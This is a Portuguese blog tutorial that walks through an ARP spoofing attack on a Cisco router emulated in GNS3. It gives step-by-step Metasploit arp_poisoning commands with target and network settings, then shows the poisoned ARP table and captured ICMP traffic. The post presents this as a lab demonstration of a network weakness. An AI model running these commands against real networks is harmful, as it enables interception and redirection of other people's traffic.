ARP spoofing Router Cisco

Neste post vou demonstrar o método de ataque ARP spoofing em um Roteador Cisco, visando mostrar a vulnerabilidade que pode estar presente em nosso parque tecnológico.

O ARP spoofing é uma técnica que  consiste em passar um mac-address falso para o sistema alvo de forma que este redirecione o tráfego para outro destino que não o legítimo.

Para demonstrar este método de ataque estarei fazendo uso do sistema operacional BackTrack 5 RC3.

A imagem do roteador Cisco estará sendo emulada através da ferramenta GNS3.

Topologia a ser utilizada

arp_cisco_04

Acesse o Linux através da console, e inicie o metasploit

root@bt:~# msfconsole

arp_cisco_01

Na console do metasploit utilize o comando

msf > use auxiliary/spoof/arp/arp_poisoning

arp_cisco_02

Para ter informações dos parâmetros do utilizados pelo arp_poisoning, utilize o comando

msf  auxiliary(arp_poisoning) > info

arp_cisco_03

Antes de iniciarmos o ataque, vamos coletar o mac address dos respectivos hosts através do roteador Cisco

arp_cisco_05PNG

Reparem que houve conectividade entre os hosts. Agora voltaremos a console do metasploit e setaremos as opções

msf  auxiliary(arp_poisoning) > set dhosts 10.40.0.2

msf  auxiliary(arp_poisoning) > set interface eth3

msf  auxiliary(arp_poisoning) > set shosts 10.40.0.0/24

msf  auxiliary(arp_poisoning) > set verbose true

Foi configurado o alvo (10.40.0.2) e setado a rede 10.40.0.0/24 para envenenar a tabela arp do roteador Cisco.

Uma vez configurado os parâmetros utilize o comando info para visualizar

msf  auxiliary(arp_poisoning) > info

arp_cisco_06

Pronto? Agora iremos começar o ataque, utilize o comando

msf  auxiliary(arp_poisoning) > exploit

arp_cisco_07

Agora vamos dar uma olhada na tabela arp do roteador Cisco; reparem que foi realizado um filtro por 10.40.0.1

arp_cisco_08

Na primeira linha já temos uma divergência, pois o endereço 10.40.0.1 GW está com o mac address do nosso servidor Arp Spoffing; vamos novamente realizar um teste de PING ao 10.40.0.1 e ao mesmo tempo deixar um tcpdump no servidor Arp Spoffing

arp_cisco_09

Tivemos conectividade com o GW; mais reparem o echo request no servidor Arp Spoffing

arp_cisco_10

E assim finalizamos mais um post.

Tags: